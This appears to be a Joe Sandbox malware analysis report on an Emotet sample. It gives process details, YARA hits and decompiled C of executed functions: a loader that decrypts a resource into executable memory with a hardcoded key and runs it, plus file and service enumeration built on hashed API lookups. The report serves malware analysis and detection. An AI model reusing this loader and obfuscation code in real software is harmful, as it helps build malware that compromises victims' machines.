Start date:	18/11/2020
Path:	C:\Users\user\Desktop\2ojdmC51As.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\2ojdmC51As.exe'
Imagebase:	0x400000
File size:	376832 bytes
MD5 hash:	5804D97670DCDFAB88BA830682355DAD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.667768852.0000000000664000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.667721626.0000000000620000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: sort.exe PID: 4564 Parent PID: 6240

General

Start time:	16:00:38
Start date:	18/11/2020
Path:	C:\Windows\SysWOW64\setupugc\sort.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\setupugc\sort.exe
Imagebase:	0x400000
File size:	376832 bytes
MD5 hash:	5804D97670DCDFAB88BA830682355DAD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.931629655.0000000002220000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.931663752.0000000002244000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: svchost.exe PID: 6680 Parent PID: 568

General

Start time:	16:00:59
Start date:	18/11/2020
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: svchost.exe PID: 6748 Parent PID: 568

General

Start time:	16:01:07
Start date:	18/11/2020
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: svchost.exe PID: 7124 Parent PID: 568

General

Start time:	16:01:15
Start date:	18/11/2020
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: 2ojdmC51As.exe PID: 6240 Parent PID: 5864 2ojdmC51As.exeCOMMON

Execution Graph

Execution Coverage:	2.6%
Dynamic/Decrypted Code Coverage:	44.4%
Signature Coverage:	26.3%
Total number of Nodes:	518
Total number of Limit Nodes:	59

Executed Functions

Function 004013A4, Relevance: 40.5, APIs: 10, Strings: 13, Instructions: 288
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E004013A4(intOrPtr __ecx) {
				void* _v8;
				intOrPtr _v16;
				char _v20;
				char _v36;
				char _v40;
				intOrPtr _v44;
				CHAR* _v52;
				intOrPtr _v64;
				char _v68;
				void* _v72;
				char _v88;
				intOrPtr _v128;
				char _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				void* _v156;
				long _v160;
				char _v176;
				void* _v180;
				intOrPtr _v184;
				char _v200;
				char _v216;
				intOrPtr _v228;
				char _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				char _v252;
				void* _v256;
				struct HINSTANCE__* _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v288;
				char _v292;
				char _v296;
				char _v300;
				char _v316;
				void* _v320;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				intOrPtr _v472;
				void* _t188;
				void* _t189;
				intOrPtr _t244;

				_push(0xffffffff);
				_push(E00429B1F);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t244;
				_v448 = __ecx;
				_v256 = 0;
				_v256 = GetProcAddress(LoadLibraryA("kernel32.dll"), "CreateDirectoryA");
				if(CreateDirectoryA("C:\\Windows\\Microsoft.NET", 0) == 0) {
					_v152 = 0x1e55;
					_v240 = 0x1155;
					_v44 = 0x409;
					_v72 = 0;
					_v160 = 0;
					_v252 = 0xa;
					_v248 = _v152;
					_v244 = _v44;
					_v260 = 0;
					_v176 = _v264;
					E00401AE0( &_v176, 0);
					E00401B90( &_v176, "LdrFin", E00405A40("LdrFin"));
					_v8 = 0;
					_v216 = _v268;
					E00401AE0( &_v216, 0);
					E00401B90( &_v216, "dReso", E00405A40("dReso"));
					_v8 = 1;
					_v36 = _v272;
					E00401AE0( &_v36, 0);
					E00401B90( &_v36, "urce_U", E00405A40("urce_U"));
					_v8 = 2;
					_v452 = E00402030( &_v288,  &_v176,  &_v216);
					_v456 = _v452;
					_v8 = 3;
					E00402030( &_v232, _v456,  &_v36);
					_v8 = 5;
					E00401AE0( &_v288, 1);
					_v200 = _v292;
					E00401AE0( &_v200, 0);
					E00401B90( &_v200, "Ldr", E00405A40("Ldr"));
					_v8 = 6;
					_v144 = _v296;
					E00401AE0( &_v144, 0);
					E00401B90( &_v144, "Acces", E00405A40("Acces"));
					_v8 = 7;
					_v88 = _v300;
					E00401AE0( &_v88, 0);
					E00401B90( &_v88, "sResource", E00405A40("sResource"));
					_v8 = 8;
					_v460 = E00402030( &_v316,  &_v200,  &_v144);
					_v464 = _v460;
					_v8 = 9;
					E00402030( &_v68, _v464,  &_v88);
					_v8 = 0xb;
					E00401AE0( &_v316, 1);
					_v52 = "ntdll.dll";
					if(_v228 != 0) {
						_v468 = _v228;
					} else {
						_v468 = 0x42b704;
					}
					_v184 = _v468;
					if(_v64 != 0) {
						_v472 = _v64;
					} else {
						_v472 = 0x42b704;
					}
					_v128 = _v472;
					_v260 = LoadLibraryA(_v52);
					 *0x437cbc = GetProcAddress(_v260, "LdrFindResource_U");
					 *0x437cb4 = GetProcAddress(_v260, "LdrAccessResource");
					_v236 =  *0x437cbc(0x400000,  &_v252, 3,  &_v40);
					if(_v236 >= 0) {
						_v236 =  *0x437cb4(0x400000, _v40,  &_v72,  &_v160);
					}
					_v180 = 0;
					if(CreateDirectoryA("C:\\ProgramData\\", 0) == 0) {
						_t189 = VirtualAlloc(0, _v160, 0x1000, 0x40); // executed
						_v180 = _t189;
					}
					E00405700(_v180, _v72, _v160);
					E0040107E("@P*w$@?97wKE9+Vey0babhTz2gVn_0Xb5q5sACHJ$qpLa@", 0x2f,  &_v20);
					E00401163(_v180, _v160,  &_v20);
					_v156 = _v180;
					_v148 = _v156();
					_v320 = 0;
					_v8 = 8;
					E00401AE0( &_v68, 1);
					_v8 = 7;
					E00401AE0( &_v88, 1);
					_v8 = 6;
					E00401AE0( &_v144, 1);
					_v8 = 5;
					E00401AE0( &_v200, 1);
					_v8 = 2;
					E00401AE0( &_v232, 1);
					_v8 = 1;
					E00401AE0( &_v36, 1);
					_v8 = 0;
					E00401AE0( &_v216, 1);
					_v8 = 0xffffffff;
					E00401AE0( &_v176, 1);
					_t188 = _v320;
				} else {
					_t188 = 0;
				}
				 *[fs:0x0] = _v16;
				return _t188;
			}

0x004013a7
0x004013a9
0x004013b4
0x004013b5
0x004013c2
0x004013c8
0x004013e9
0x004013fe
0x00401407
0x00401411
0x0040141b
0x00401422
0x00401429
0x00401433
0x00401443
0x0040144c
0x00401452
0x00401462
0x00401470
0x0040148e
0x00401493
0x004014a0
0x004014ae
0x004014cc
0x004014d1
0x004014db
0x004014e3
0x004014fe
0x00401503
0x00401528
0x00401534
0x0040153a
0x0040154c
0x00401554
0x00401560
0x0040156b
0x00401579
0x00401597
0x0040159c
0x004015a6
0x004015b4
0x004015d2
0x004015d7
0x004015e1
0x004015e9
0x00401604
0x00401609
0x0040162e
0x0040163a
0x00401640
0x0040164f
0x00401657
0x00401663
0x00401668
0x00401676
0x0040168a
0x00401678
0x00401678
0x00401678
0x00401696
0x004016a0
0x004016b1
0x004016a2
0x004016a2
0x004016a2
0x004016bd
0x004016ca
0x004016e2
0x004016f9
0x00401716
0x00401723
0x0040173f
0x0040173f
0x00401745
0x0040175e
0x00401770
0x00401776
0x00401776
0x0040178e
0x004017a1
0x004017bb
0x004017c9
0x004017d5
0x004017db
0x004017e5
0x004017ee
0x004017f3
0x004017fc
0x00401801
0x0040180d
0x00401812
0x0040181e
0x00401823
0x0040182f
0x00401834
0x0040183d
0x00401842
0x0040184e
0x00401853
0x00401862
0x00401867
0x00401400
0x00401400
0x00401400
0x00401870
0x0040187a

APIs

LoadLibraryA.KERNEL32(kernel32.dll,CreateDirectoryA), ref: 004013DC
GetProcAddress.KERNEL32(00000000), ref: 004013E3
CreateDirectoryA.KERNELBASE(C:\Windows\Microsoft.NET,00000000), ref: 004013F6

Strings

C:\ProgramData\, xrefs: 00401751
LdrAccessResource, xrefs: 004016E7
Ldr, xrefs: 0040157E, 0040158C
kernel32.dll, xrefs: 004013D7
dReso, xrefs: 004014B3, 004014C1
sResource, xrefs: 004015EE, 004015FC
C:\Windows\Microsoft.NET, xrefs: 004013F1
LdrFin, xrefs: 00401475, 00401483
CreateDirectoryA, xrefs: 004013D2
LdrFindResource_U, xrefs: 004016D0
Acces, xrefs: 004015B9, 004015C7
urce_U, xrefs: 004014E8, 004014F6
@P*w$@?97wKE9+Vey0babhTz2gVn_0Xb5q5sACHJ$qpLa@, xrefs: 0040179C

Memory Dump Source

Source File: 00000000.00000002.667445276.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.667442323.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667464028.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.667516419.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667525135.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.667532340.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2ojdmC51As.jbxd

Similarity

API ID: AddressCreateDirectoryLibraryLoadProc
String ID: @P*w$@?97wKE9+Vey0babhTz2gVn_0Xb5q5sACHJ$qpLa@$Acces$C:\ProgramData\$C:\Windows\Microsoft.NET$CreateDirectoryA$Ldr$LdrAccessResource$LdrFin$LdrFindResource_U$dReso$kernel32.dll$sResource$urce_U
API String ID: 3952968459-2121162702
Opcode ID: 7d620622b5630e1590437648c71b2aba6933f66f18f5174dfcf6b2e9e6efda78
Instruction ID: 061a306ec623a826179d85857fa582b4a8c01ab5e49a60f3ccf10d5f337b011f
Opcode Fuzzy Hash: 7d620622b5630e1590437648c71b2aba6933f66f18f5174dfcf6b2e9e6efda78
Instruction Fuzzy Hash: BDD14070E41258ABDB20DB90DD56BEEB7B4AB18304F1081EAE509772D1DBB81F84CF65

Uniqueness

Uniqueness Score: -1.00%

Function 022338F0, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 189
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E022338F0(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v524;
				short _v1044;
				short _v1588;
				intOrPtr _v1590;
				struct _WIN32_FIND_DATAW _v1636;
				void* _v1640;
				intOrPtr _v1652;
				void* __ebx;
				void* __ebp;
				void* _t22;
				signed int _t24;
				intOrPtr* _t28;
				intOrPtr _t33;
				void* _t35;
				intOrPtr* _t39;
				intOrPtr* _t41;
				intOrPtr* _t43;
				signed int _t49;
				int _t55;
				void* _t58;
				void* _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t100;

				_t93 = __ecx;
				_t97 = __edx;
				_v1640 = __ecx;
				_t22 = 0x1b0f738d;
				_t58 = _v1640;
				goto L1;
				do {
					while(1) {
						L1:
						_t100 = _t22 - 0xd5d5438;
						if(_t100 <= 0) {
							break;
						}
						if(_t22 == 0x1b0f738d) {
							_t22 = 0x1c39f1c;
							continue;
						} else {
							if(_t22 != 0x3aa0d798) {
								goto L6;
							} else {
								if((_v1636.dwFileAttributes & 0x00000010) == 0) {
									_t24 = _a4( &_v1636, _a8);
									asm("sbb eax, eax");
									_t22 = ( ~_t24 & 0xffb9c0ef) + 0x651b5f5;
								} else {
									if(_v1636.cFileName != 0x2e) {
										L30:
										if(_t97 == 0) {
											goto L29;
										} else {
											_t96 = E022334C0(0x223d260);
											_t28 =  *0x223dc60;
											if(_t28 == 0) {
												_t28 = E02233E80(_t58, E02233F20(0xe66945e6), 0xcca28b0d, _t97);
												 *0x223dc60 = _t28;
											}
											 *_t28( &_v524, 0x104, _t96, _t93,  &(_v1636.cFileName));
											E022338F0( &_v524, _t97, _a4, _a8);
											_t98 = _t98 + 0x1c;
											E02233460(_t96);
											_t22 = 0x60b76e4;
										}
									} else {
										_t33 = _v1590;
										if(_t33 == 0 || _t33 == 0x2e && _v1588 == 0) {
											L29:
											_t22 = 0x60b76e4;
										} else {
											goto L30;
										}
									}
								}
								continue;
							}
						}
						L40:
					}
					if(_t100 == 0) {
						if( *0x223e004 == 0) {
							 *0x223e004 = E02233E80(_t58, E02233F20(0xbb398380), 0xf53ce71f, _t97);
						}
						_t35 = FindFirstFileW( &_v1044,  &_v1636); // executed
						_t58 = _t35;
						if(_t58 == 0xffffffff) {
							return _t35;
						} else {
							_t22 = 0x3aa0d798;
							goto L1;
						}
					} else {
						if(_t22 == 0x1c39f1c) {
							_t95 = E022334C0(0x223d240);
							_t39 =  *0x223dc60;
							if(_t39 == 0) {
								_t39 = E02233E80(_t58, E02233F20(0xe66945e6), 0xcca28b0d, _t97);
								 *0x223dc60 = _t39;
							}
							 *_t39( &_v1044, 0x104, _t95, _t93);
							_t41 =  *0x223dea8;
							_t98 = _t98 + 0x10;
							if(_t41 == 0) {
								_t41 = E02233E80(_t58, E02233F20(0xbb398380), 0x97f883e, _t97);
								 *0x223dea8 = _t41;
							}
							_t94 =  *_t41();
							_t43 =  *0x223e1a0;
							if(_t43 == 0) {
								_t43 = E02233E80(_t58, E02233F20(0xbb398380), 0x26c3f343, _t97);
								 *0x223e1a0 = _t43;
							}
							 *_t43(_t94, 0, _t95);
							_t93 = _v1652;
							_t22 = 0xd5d5438;
							goto L1;
						} else {
							if(_t22 == 0x60b76e4) {
								if( *0x223dfd4 == 0) {
									 *0x223dfd4 = E02233E80(_t58, E02233F20(0xbb398380), 0xd3e90d14, _t97);
								}
								_t49 = FindNextFileW(_t58,  &_v1636); // executed
								asm("sbb eax, eax");
								_t22 = ( ~_t49 & 0x344f21a3) + 0x651b5f5;
								goto L1;
							} else {
								if(_t22 == 0x651b5f5) {
									if( *0x223e064 == 0) {
										 *0x223e064 = E02233E80(_t58, E02233F20(0xbb398380), 0xa4a77084, _t97);
									}
									_t55 = FindClose(_t58); // executed
									return _t55;
								}
								goto L6;
							}
						}
					}
					goto L40;
					L6:
				} while (_t22 != 0x36605fc2);
				return _t22;
				goto L40;
			}

0x022338fa
0x022338fc
0x022338fe
0x02233902
0x02233907
0x0223390b
0x02233910
0x02233910
0x02233910
0x02233910
0x02233915
0x00000000
0x00000000
0x02233a79
0x02233b62
0x00000000
0x02233a7f
0x02233a84
0x00000000
0x02233a8a
0x02233a8f
0x02233b48
0x02233b51
0x02233b58
0x02233a95
0x02233a9b
0x02233abf
0x02233ac1
0x00000000
0x02233ac3
0x02233acd
0x02233acf
0x02233ad6
0x02233ae9
0x02233aee
0x02233aee
0x02233b07
0x02233b23
0x02233b28
0x02233b2d
0x02233b32
0x02233b32
0x02233a9d
0x02233a9d
0x02233aa5
0x02233ab5
0x02233ab5
0x00000000
0x00000000
0x00000000
0x02233aa5
0x02233a9b
0x00000000
0x02233a8f
0x02233a84
0x00000000
0x02233a79
0x0223391b
0x02233a33
0x02233a4b
0x02233a4b
0x02233a5d
0x02233a5f
0x02233a64
0x02233b9d
0x02233a6a
0x02233a6a
0x00000000
0x02233a6a
0x02233921
0x02233926
0x02233992
0x02233994
0x0223399b
0x022339ae
0x022339b3
0x022339b3
0x022339c7
0x022339c9
0x022339ce
0x022339d3
0x022339e6
0x022339eb
0x022339eb
0x022339f2
0x022339f4
0x022339fb
0x02233a0e
0x02233a13
0x02233a13
0x02233a1c
0x02233a1e
0x02233a22
0x00000000
0x02233928
0x0223392d
0x02233953
0x0223396b
0x0223396b
0x02233976
0x0223397a
0x02233981
0x00000000
0x0223392f
0x02233934
0x02233b73
0x02233b8b
0x02233b8b
0x02233b91
0x00000000
0x02233b91
0x00000000
0x02233934
0x0223392d
0x02233926
0x00000000
0x0223393a
0x0223393a
0x0223394b
0x00000000

APIs

FindNextFileW.KERNELBASE(?,?,00000000,0223998D,16BF64F2,00000001), ref: 02233976
FindFirstFileW.KERNELBASE(?,?,00000000,0223998D,16BF64F2,00000001), ref: 02233A5D
FindClose.KERNELBASE(?,00000000,0223998D,16BF64F2,00000001), ref: 02233B91

Strings

Ei, xrefs: 02233AD8
8T], xrefs: 02233A22
8T], xrefs: 02233910
Ei, xrefs: 0223399D
., xrefs: 02233A95

Memory Dump Source

Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true

Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID: .$8T]$8T]$Ei$Ei
API String ID: 3541575487-3972632629
Opcode ID: e49163eba9a52b0195cf0fe269b95a06e541571b8fa58a3d11c86563151b10d6
Instruction ID: e2110a1afe3a452984fedbae5295bfbe0882b947111b9b60d376f3440b7b6ca3
Opcode Fuzzy Hash: e49163eba9a52b0195cf0fe269b95a06e541571b8fa58a3d11c86563151b10d6
Instruction Fuzzy Hash: B851C4F5B3430197C726EAF4A84467B36E6AB80354F04099DE946C7248EF79CA1587D2

Uniqueness

Uniqueness Score: -1.00%

Function 02235070, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 205
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 65%

			E02235070(void* __ecx, short** __edx) {
				char _v4;
				char _v8;
				short** _v12;
				char _v16;
				void* _v20;
				void* _v24;
				intOrPtr _v28;
				intOrPtr _v44;
				signed int _v56;
				intOrPtr _v68;
				void* __ebx;
				void* __ebp;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t23;
				void* _t26;
				void* _t30;
				void* _t34;
				void* _t37;
				void* _t38;
				void* _t39;
				signed int _t40;
				void* _t48;
				short** _t81;
				void* _t83;
				signed int _t84;
				void* _t85;
				void* _t90;
				void* _t93;
				void* _t94;

				_v12 = __edx;
				_t48 = 0;
				_t81 = _v12;
				_t90 = 0;
				_v20 = __ecx;
				_t84 = 0x200c4c64;
				while(1) {
					_t16 = _v28;
					while(1) {
						L2:
						_t93 = _t84 - 0x200c4c64;
						if(_t93 > 0) {
							break;
						}
						if(_t93 == 0) {
							_t84 = 0xbb9a688;
							continue;
						} else {
							_t94 = _t84 - 0xc62322e;
							if(_t94 > 0) {
								__eflags = _t84 - 0xd366d74;
								if(_t84 == 0xd366d74) {
									_t81 =  &(_t81[0xb]);
									__eflags = _t81 - _t16;
									asm("sbb esi, esi");
									_t84 = (_t84 & 0x1131a8a6) + 0x18b16b79;
									continue;
								} else {
									__eflags = _t84 - 0x18b16b79;
									if(_t84 != 0x18b16b79) {
										goto L39;
									} else {
										E02234250(_t48, _t90);
										_t84 = 0x34957300;
										while(1) {
											_t16 = _v28;
											goto L2;
										}
									}
								}
							} else {
								if(_t94 == 0) {
									_t37 =  *0x223db9c;
									__eflags = _t37;
									if(_t37 == 0) {
										_t37 = E02233E80(_t48, E02233F20(0x667fdee), 0x72841a68, _t90);
										 *0x223db9c = _t37;
									}
									_t38 =  *_t37(_v20, 0, 0x30, 3, _t48, 0x20000,  &_v8,  &_v16, 0, 0);
									__eflags = _t38;
									if(_t38 == 0) {
										L29:
										_t84 = 0x18b16b79;
										while(1) {
											_t16 = _v28;
											goto L2;
										}
									} else {
										_t39 =  *0x223dd4c;
										__eflags = _t39;
										if(_t39 == 0) {
											_t39 = E02233E80(_t48, E02233F20(0xbb398380), 0xae3c1a47, _t90);
											 *0x223dd4c = _t39;
										}
										_t40 =  *_t39();
										_t84 = 0x29e3141f;
										_t83 = (_t40 & 0x0000001f) * 0x2c + _t48;
										_t16 = _v56 * 0x2c + _t48;
										__eflags = _t83 - _t16;
										_v68 = _t16;
										_t81 =  >=  ? _t48 : _t83;
										continue;
									}
									L47:
								} else {
									if(_t84 == 0xc9d2df) {
										_t90 = E022342F0(_t48, 0x2000);
										__eflags = _t90;
										_t84 =  !=  ? 0xc62322e : 0x34957300;
										while(1) {
											_t16 = _v28;
											goto L2;
										}
									} else {
										if(_t84 != 0xbb9a688) {
											L39:
											__eflags = _t84 - 0x230370fe;
											if(_t84 != 0x230370fe) {
												while(1) {
													_t16 = _v28;
													goto L2;
												}
											}
										} else {
											_t16 = E022342F0(_t48, 0x20000);
											_t48 = _t16;
											if(_t48 != 0) {
												_t84 = 0xc9d2df;
												while(1) {
													_t16 = _v28;
													goto L2;
												}
											}
										}
									}
								}
							}
						}
						L46:
						return _t16;
						goto L47;
					}
					__eflags = _t84 - 0x3024435d;
					if(__eflags > 0) {
						__eflags = _t84 - 0x34957300;
						if(_t84 == 0x34957300) {
							_t17 =  *0x223dea8;
							__eflags = _t17;
							if(_t17 == 0) {
								_t17 = E02233E80(_t48, E02233F20(0xbb398380), 0x97f883e, _t90);
								 *0x223dea8 = _t17;
							}
							_t85 =  *_t17();
							_t19 =  *0x223e1a0;
							__eflags = _t19;
							if(_t19 == 0) {
								_t19 = E02233E80(_t48, E02233F20(0xbb398380), 0x26c3f343, _t90);
								 *0x223e1a0 = _t19;
							}
							return  *_t19(_t85, 0, _t48);
						}
						goto L39;
					} else {
						if(__eflags == 0) {
							_t23 =  *0x223dd1c;
							__eflags = _t23;
							if(_t23 == 0) {
								_t23 = E02233E80(_t48, E02233F20(0x667fdee), 0xe8428d8f, _t90);
								 *0x223dd1c = _t23;
							}
							 *_t23(_v24, 1, _t90, 0x2000,  &_v4);
							asm("sbb esi, esi");
							_t26 =  *0x223ddb8;
							_t84 = (_t84 & 0x1dde7ce2) + 0xd366d74;
							__eflags = _t26;
							if(_t26 == 0) {
								_t26 = E02233E80(_t48, E02233F20(0x667fdee), 0x505cb3fe, _t90);
								 *0x223ddb8 = _t26;
							}
							_t16 =  *_t26(_v44);
							goto L39;
						} else {
							__eflags = _t84 - 0x29e3141f;
							if(_t84 == 0x29e3141f) {
								__eflags =  *0x223dab4;
								if( *0x223dab4 == 0) {
									 *0x223dab4 = E02233E80(_t48, E02233F20(0x667fdee), 0x203166f7, _t90);
								}
								_t30 = OpenServiceW(_v20,  *_t81, 1); // executed
								__eflags = _t30;
								_v24 = _t30;
								_t84 =  !=  ? 0x3024435d : 0xd366d74;
								continue;
							} else {
								__eflags = _t84 - 0x2b14ea56;
								if(_t84 != 0x2b14ea56) {
									goto L39;
								} else {
									_t34 =  *0x223dcf0;
									__eflags = _t34;
									if(_t34 == 0) {
										_t34 = E02233E80(_t48, E02233F20(0x667fdee), 0x60075e37, _t90);
										 *0x223dcf0 = _t34;
									}
									 *_t34(_v12, 1, _t90);
									goto L29;
								}
							}
						}
					}
					goto L46;
				}
			}

0x02235076
0x0223507a
0x0223507d
0x02235081
0x02235083
0x02235087
0x0223508c
0x0223508c
0x02235090
0x02235090
0x02235090
0x02235096
0x00000000
0x00000000
0x0223509c
0x022351cd
0x00000000
0x022350a2
0x022350a2
0x022350a8
0x02235190
0x02235196
0x022351b5
0x022351b8
0x022351ba
0x022351c2
0x00000000
0x02235198
0x02235198
0x0223519e
0x00000000
0x022351a4
0x022351a6
0x022351ab
0x0223508c
0x0223508c
0x00000000
0x0223508c
0x0223508c
0x0223519e
0x022350ae
0x022350ae
0x022350fc
0x02235101
0x02235103
0x02235116
0x0223511b
0x0223511b
0x0223513e
0x02235140
0x02235142
0x0223522a
0x0223522a
0x0223508c
0x0223508c
0x00000000
0x0223508c
0x02235148
0x02235148
0x0223514d
0x0223514f
0x02235162
0x02235167
0x02235167
0x0223516c
0x02235171
0x0223517e
0x02235180
0x02235182
0x02235184
0x02235188
0x00000000
0x02235188
0x00000000
0x022350b0
0x022350b6
0x022350e9
0x022350f0
0x022350f7
0x0223508c
0x0223508c
0x00000000
0x0223508c
0x022350b8
0x022350be
0x022352f5
0x022352f5
0x022352fb
0x0223508c
0x0223508c
0x00000000
0x0223508c
0x0223508c
0x022350c4
0x022350c9
0x022350ce
0x022350d2
0x022350d8
0x0223508c
0x0223508c
0x00000000
0x0223508c
0x0223508c
0x022350d2
0x022350be
0x022350b6
0x022350ae
0x022350a8
0x0223535b
0x0223535b
0x00000000
0x0223535b
0x022351d7
0x022351dd
0x022352ed
0x022352f3
0x02235302
0x02235307
0x02235309
0x0223531c
0x02235321
0x02235321
0x02235328
0x0223532a
0x0223532f
0x02235331
0x02235344
0x02235349
0x02235349
0x00000000
0x02235352
0x00000000
0x022351e3
0x022351e3
0x0223527a
0x0223527f
0x02235281
0x02235294
0x02235299
0x02235299
0x022352af
0x022352b3
0x022352b5
0x022352c0
0x022352c6
0x022352c8
0x022352db
0x022352e0
0x022352e0
0x022352e9
0x00000000
0x022351e9
0x022351e9
0x022351ef
0x02235239
0x0223523b
0x02235253
0x02235253
0x02235260
0x02235262
0x02235264
0x02235272
0x00000000
0x022351f1
0x022351f1
0x022351f7
0x00000000
0x022351fd
0x022351fd
0x02235202
0x02235204
0x02235217
0x0223521c
0x0223521c
0x02235228
0x00000000
0x02235228
0x022351f7
0x022351ef
0x022351e3
0x00000000
0x022351dd

APIs

OpenServiceW.ADVAPI32(?,?,00000001,00000000,?,?,00000000,?,?,?,?,?,?,0223890D), ref: 02235260

Strings

]C$0, xrefs: 0223526D
tm6, xrefs: 02235268
]C$0, xrefs: 022351D7
tm6, xrefs: 02235190

Memory Dump Source

Source File: 00000000.00000002.667968476.0000000002231000.00000020.00000001.sdmp, Offset: 02230000, based on PE: true

Associated: 00000000.00000002.667963467.0000000002230000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667978892.000000000223D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.667987619.0000000002240000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2230000_2ojdmC51As.jbxd

Yara matches

Similarity

API ID: OpenService
String ID: ]C$0$]C$0$tm6$tm6
API String ID: 3098006287-1577568632
Opcode ID: 1c2b2a8c3210c0b2accbef479441618437f9ec0a63e185d060dbafee3c567305
Instruction ID: 27334de478ac2b60e13b1102a5e22ae2e498ffe39512ad7f05b8d8e0e02cb570
Opcode Fuzzy Hash: 1c2b2a8c3210c0b2accbef479441618437f9ec0a63e185d060dbafee3c567305
Instruction Fuzzy Hash: 29610EB2F303015BDB16AAF8A85472E72E6AB8C644F850479F845DF25CDB74CD1087C2

Uniqueness

Uniqueness Score: -1.00%

Function 00425FF1, Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E00425FF1() {
				unsigned int _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				long _t28;
				void* _t40;
				void* _t50;

				_t50 = 0x439be0;
				_t18 = GetVersion();
				 *0x00439C34 = (_t18 & 0x000000ff) + ((_t18 & 0x000000ff) << 8);
				 *0x00439C38 = _t18 >> 0x1f;
				asm("sbb eax, eax");
				_t40 = 1;
				_t19 = _t18 + 1;
				 *0x00439C3C = _t19;
				 *0x00439C40 = _t40 - _t19;
				 *0x00439C44 = _t19;
				 *0x00439C48 = 0;
				if(_t19 != 0) {
					_t28 = GetProcessVersion(0); // executed
					asm("sbb eax, eax");
					 *((intOrPtr*)(0x439c48)) = _t28 + 1;
				}
				E004171BC(_t50);
				 *((intOrPtr*)(_t50 + 0x24)) = 0;
				E00417178(_t50);
				 *((intOrPtr*)(_t50 + 0x3c)) = LoadCursorA(0, 0x7f02);
				 *((intOrPtr*)(_t50 + 0x40)) = LoadCursorA(0, 0x7f00);
				 *((intOrPtr*)(_t50 + 0x50)) = 0;
				 *((intOrPtr*)(_t50 + 0x44)) = 0;
				_t26 = (0 |  *((intOrPtr*)(_t50 + 0x5c)) != 0x00000000) + 1;
				 *((intOrPtr*)(_t50 + 0x10)) = _t26;
				 *((intOrPtr*)(_t50 + 0x14)) = _t26;
				return _t50;
			}

0x00426066
0x00426068
0x0042607f
0x00426089
0x0042608c
0x0042608e
0x0042608f
0x00426096
0x00426099
0x0042609c
0x0042609f
0x004260a2
0x004260a5
0x004260b0
0x004260b3
0x004260b3
0x004260b8
